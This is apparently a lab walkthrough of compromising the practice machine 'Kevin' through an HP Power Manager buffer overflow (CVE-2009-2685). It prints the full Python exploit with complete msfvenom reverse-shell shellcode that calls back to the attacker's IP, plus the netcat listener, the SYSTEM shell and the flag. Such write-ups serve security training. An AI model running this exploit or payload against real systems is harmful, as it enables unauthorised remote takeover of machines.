Kevin

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.115.45
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 01:55 EST
Nmap scan report for 192.168.115.45                                                                                                                                         
Host is up, received echo-reply ttl 125 (0.12s latency).                                                                                                                    
Scanned at 2025-11-10 01:55:28 EST for 101s                                           
Not shown: 65523 closed tcp ports (reset)                                             
PORT      STATE SERVICE      REASON          VERSION                                  
80/tcp    open  http         syn-ack ttl 125 GoAhead WebServer                        
| http-title: HP Power Manager                                                        
|_Requested resource was http://192.168.115.45/index.asp                              
| http-methods:                                                                                                                                                             
|_  Supported Methods: GET HEAD                                                                                                                                             
|_http-server-header: GoAhead-Webs                                                                                                                                          
135/tcp   open  msrpc        syn-ack ttl 125 Microsoft Windows RPC                                                                                                          
139/tcp   open  netbios-ssn  syn-ack ttl 125 Microsoft Windows netbios-ssn                                                                                                  
445/tcp   open  microsoft-ds syn-ack ttl 125 Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)                                                                  
3389/tcp  open  tcpwrapped   syn-ack ttl 125                                                                                                                                
| rdp-ntlm-info:                                                                                                                                                            
|   Target_Name: KEVIN                                                                                                                                                      
|   NetBIOS_Domain_Name: KEVIN                                                                                                                                              
|   NetBIOS_Computer_Name: KEVIN                                                                                                                                            
|   DNS_Domain_Name: kevin                                                                                                                                                  
|   DNS_Computer_Name: kevin                                                          
|   Product_Version: 6.1.7600                                                         
|_  System_Time: 2025-11-10T06:56:54+00:00                                            
| ssl-cert: Subject: commonName=kevin                                                 
| Issuer: commonName=kevin                                                            
| Public Key type: rsa                                                                
| Public Key bits: 2048                                                                                                                                                     
| Signature Algorithm: sha1WithRSAEncryption                                                                                                                                
| Not valid before: 2025-11-09T06:51:48                                                                                                                                     
| Not valid after:  2026-05-11T06:51:48                                                                                                                                     
| MD5:   f8ca:2645:3c64:cef1:1c8c:2fc6:30de:81d6                                                                                                                            
| SHA-1: 1192:49a2:11af:b68a:5d22:8615:efff:45fb:6723:b3bd                                                                                                                  
| -----BEGIN CERTIFICATE-----                                                                                                                                               
| MIICzjCCAbagAwIBAgIQI5zyqr9unpJN3uLb6MzbCzANBgkqhkiG9w0BAQUFADAQ
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-11-10T06:57:09+00:00; +1s from scanner time.
3573/tcp  open  tag-ups-1?   syn-ack ttl 125
49152/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
49159/tcp open  msrpc        syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>

HTTP (80):

Lets browse to that port:

With admin:admin, we can login successfully:

If we went to the help tab, we will find the exact version of the running service:

Exploitation:

Search for public exploits:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]                                
└─$ searchsploit HP Power Manager                                                     
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure                                                        | php/webapps/23163.txt
Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit)                                                   | windows/remote/16785.rb         
Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow                                | windows/remote/10099.py
HP Power Manager - 'formExportDataLogs' Remote Buffer Overflow (Metasploit)                                                               | cgi/remote/18015.rb
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Lets try the python one:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]                                
└─$ searchsploit -m windows/remote/10099.py                                           
  Exploit: Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow                                                       
      URL: https://www.exploit-db.com/exploits/10099                                  
     Path: /usr/share/exploitdb/exploits/windows/remote/10099.py         
    Codes: CVE-2009-2685                                                              
 Verified: True                                                                       
File Type: Python script, ASCII text executable                                       
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Kevin/10099.py

Read the file:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ cat 10099.py
<snipped>

import sys
from socket import *

print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"

try:
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
   sys.exit()

PORT  = 80
RET   = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll

# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
<snipped>
"\x4f\x4f\x42\x4d\x5a")

EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'

evil =  "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()

The only thing we want to change here is the shellcode, to add our own IP address and local port:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]                                                                                                                      
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.187 LPORT=80 -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a' -f c      
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload                                                                                      
[-] No arch selected, selecting arch: x86 from the payload                                                                                                                  
Found 11 compatible encoders                                                                                                                                                
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai                                                                                                        
x86/shikata_ga_nai failed with Failed to locate a valid permutation.                                                                                                        
Attempting to encode payload with 1 iterations of x86/call4_dword_xor                                                                                                       
x86/call4_dword_xor succeeded with size 348 (iteration=0)                                                                                                                   
x86/call4_dword_xor chosen with final size 348                                                                                                                              
Payload size: 348 bytes                                                                                                                                                     
Final size of c file: 1491 bytes                                                                                                                                            
unsigned char buf[] =                                                                                                                                                       
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
<snipped>
"\xe3\xbd\x35\x86\x85\xca\xe1\xab\x96\xeb\x71\x14";

Add that shellcode to the script:

#!/usr/bin/python
# HP Power Manager Administration Universal Buffer Overflow Exploit
# CVE 2009-2685
# Tested on Win2k3 Ent SP2 English, Win XP Sp2 English
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 07/11/2009
#
# ryujin@bt:~$ ./hppowermanager.py 172.16.30.203
# HP Power Manager Administration Universal Buffer Overflow Exploit
# ryujin __A-T__ offensive-security.com
# [+] Sending evil buffer...
# HTTP/1.0 200 OK
# [+] Done!
# [*] Check your shell at 172.16.30.203:4444 , can take up to 1 min to spawn your shell
# ryujin@bt:~$ nc -v 172.16.30.203 4444
# 172.16.30.203: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.203] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.

# C:\WINDOWS\system32>

import sys
from socket import *

print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"

try:
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
   sys.exit()

PORT  = 80
RET   = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll

# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x96\xb8\x8e\xc1\x83\xee\xfc\xe2\xf4\x6a\x50\x0c\xc1"
"\x96\xb8\xee\x48\x73\x89\x4e\xa5\x1d\xe8\xbe\x4a\xc4\xb4"
"\x05\x93\x82\x33\xfc\xe9\x99\x0f\xc4\xe7\xa7\x47\x22\xfd"
"\xf7\xc4\x8c\xed\xb6\x79\x41\xcc\x97\x7f\x6c\x33\xc4\xef"
"\x05\x93\x86\x33\xc4\xfd\x1d\xf4\x9f\xb9\x75\xf0\x8f\x10"
"\xc7\x33\xd7\xe1\x97\x6b\x05\x88\x8e\x5b\xb4\x88\x1d\x8c"
"\x05\xc0\x40\x89\x71\x6d\x57\x77\x83\xc0\x51\x80\x6e\xb4"
"\x60\xbb\xf3\x39\xad\xc5\xaa\xb4\x72\xe0\x05\x99\xb2\xb9"
"\x5d\xa7\x1d\xb4\xc5\x4a\xce\xa4\x8f\x12\x1d\xbc\x05\xc0"
"\x46\x31\xca\xe5\xb2\xe3\xd5\xa0\xcf\xe2\xdf\x3e\x76\xe7"
"\xd1\x9b\x1d\xaa\x65\x4c\xcb\xd0\xbd\xf3\x96\xb8\xe6\xb6"
"\xe5\x8a\xd1\x95\xfe\xf4\xf9\xe7\x91\x47\x5b\x79\x06\xb9"
"\x8e\xc1\xbf\x7c\xda\x91\xfe\x91\x0e\xaa\x96\x47\x5b\x91"
"\xc6\xe8\xde\x81\xc6\xf8\xde\xa9\x7c\xb7\x51\x21\x69\x6d"
"\x19\xab\x93\xd0\x4e\x69\xbb\x03\xe6\xc3\x96\xb8\xde\x48"
"\x70\xd2\x9e\x97\xc1\xd0\x17\x64\xe2\xd9\x71\x14\x13\x78"
"\xfa\xcd\x69\xf6\x86\xb4\x7a\xd0\x7e\x74\x34\xee\x71\x14"
"\xfe\xdb\xe3\xa5\x96\x31\x6d\x96\xc1\xef\xbf\x37\xfc\xaa"
"\xd7\x97\x74\x45\xe8\x06\xd2\x9c\xb2\xc0\x97\x35\xca\xe5"
"\x86\x7e\x8e\x85\xc2\xe8\xd8\x97\xc0\xfe\xd8\x8f\xc0\xee"
"\xdd\x97\xfe\xc1\x42\xfe\x10\x47\x5b\x48\x76\xf6\xd8\x87"
"\x69\x88\xe6\xc9\x11\xa5\xee\x3e\x43\x03\x7e\x74\x34\xee"
"\xe6\x67\x03\x05\x13\x3e\x43\x84\x88\xbd\x9c\x38\x75\x21"
"\xe3\xbd\x35\x86\x85\xca\xe1\xab\x96\xeb\x71\x14")

EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'

evil =  "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()

Now lets start a netcat listener, then run the script with python2:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ rlwrap nc -nlvp 80                               
listening on [any] 80 ...

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ python2 10099.py 192.168.115.45
HP Power Manager Administration Universal Buffer Overflow Exploit
ryujin __A-T__ offensive-security.com
[+] Sending evil buffer...
HTTP/1.0 200 OK

[+] Done!
[*] Check your shell at 192.168.115.45:4444 , can take up to 1 min to spawn your shell

After waiting a minute:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ rlwrap nc -nlvp 80                               
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.115.45] 49205
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Here we have a reverse shell as system.

Get the flag:

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
3ca97c1c18601246670a218e277c9552

PreviousWindows NextSquid

Last updated 2 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagHTTP (80):

hashtagExploitation:

Enumeration:

Port Scanning:

HTTP (80):

Exploitation: